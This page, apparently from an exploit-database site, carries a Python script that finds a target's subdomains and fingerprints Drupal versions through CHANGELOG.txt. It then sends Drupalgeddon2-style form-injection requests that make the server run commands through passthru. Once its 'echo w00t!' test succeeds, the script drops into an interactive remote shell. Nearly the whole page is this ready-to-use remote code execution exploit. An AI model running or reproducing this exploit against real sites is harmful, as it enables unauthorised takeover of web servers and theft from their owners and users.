Drupal Exploiter on subdomains brute-forcing (RCE)

2018.05.22
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/env python import requests,time,sys,re # Authors: # - batinihani ~ https://github.com/batininhani/ # - alpereneymen ~ https://github.com/alpereneymen/ class bcolors: HEADER = '\033[95m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' def exploit(HOST,cmq): global r get_params = {'q': 'user/password', 'name[#post_render][]': 'passthru', 'name[#markup]': "'"+cmq+"'",'name[#type]': 'markup'} post_params = {'form_id': 'user_pass', '_triggering_element_name': 'name'} r = requests.post(HOST, data=post_params, params=get_params) m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text) if m: found = m.group(1) get_params = {'q': 'file/ajax/name/#value/' + found} post_params = {'form_build_id': found} r = requests.post(HOST, data=post_params, params=get_params) def get_version(url): try: response = requests.get(url, timeout=2, headers={ 'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13'}) contents = response.text if "Drupal" in contents: splitted = contents.split() print " {} [+] {} Version : {} {}\n".format(bcolors.OKGREEN,url,splitted[1].replace(",",""),bcolors.ENDC) okno = raw_input("Do you want try exploit ? [Y/n] -> ") if okno == "Y" or okno == "y": while True: http_https = raw_input(bcolors.OKGREEN + "HTTP / HTTPS ? -> " + bcolors.ENDC) if http_https == "http" or http_https == "HTTP": http_https = "http://" break elif http_https == "https" or http_https == "HTTPS": http_https = "https://" break else: continue www_ask = raw_input(bcolors.OKGREEN+"If it's not subdomain put 'www' -> "+bcolors.ENDC) if www_ask == "www": www_ask = "www" else: www_ask = "" HOST = http_https + www_ask + host + "/" echo = "'echo w00t!'" exploit(HOST, echo) if r.text.splitlines()[0] == "w00t!": print("\n"+bcolors.OKGREEN+"YOU GOT A SHELL!! "+bcolors.ENDC+"\n") time.sleep(2.0) while True: cmq = raw_input('\033[1;31mshell > \033[1;m') if cmq == "quit" or cmq == "q": break else: cmq = "'%s'" %cmq exploit(HOST, cmq) print r.text[(r.text.index("")+len("")):r.text.index("[{")] else: print "[i]Not Exploitable!\n" pass except requests.exceptions.InvalidURL: print "\n[i] Done!" except (requests.ConnectionError,requests.ReadTimeout,requests.TooManyRedirects): time.sleep(0.1) target = raw_input(bcolors.OKGREEN + "Target :" + bcolors.ENDC) yn = raw_input(bcolors.WARNING + "Do you want use proxy ?" + bcolors.BOLD + "[Y/N] :" + bcolors.ENDC) if yn == "Y" or yn =="y": p_ip = raw_input(bcolors.OKGREEN + "IP :" + bcolors.ENDC) p_port = raw_input(bcolors.OKGREEN + "PORT :" + bcolors.ENDC) p_full = p_ip + ":" + p_port else: p_full = "" # Change Proxy http_proxy = p_full proxyDict = {"http": http_proxy} hostsearch = "http://api.hackertarget.com/hostsearch/?q=" + target response = requests.get(hostsearch, headers={ 'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13'}, proxies=proxyDict) hosts_ips = response.text if "error check your search parameter" in hosts_ips: sys.exit("Change Proxy!") else: content = hosts_ips.split("\n") result = [] for line in content: result.append(line.split(',')[0]) for host in result: print ("[i]" + host + "-> CHECKING..") get_version("http://" + host + "/CHANGELOG.txt")


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top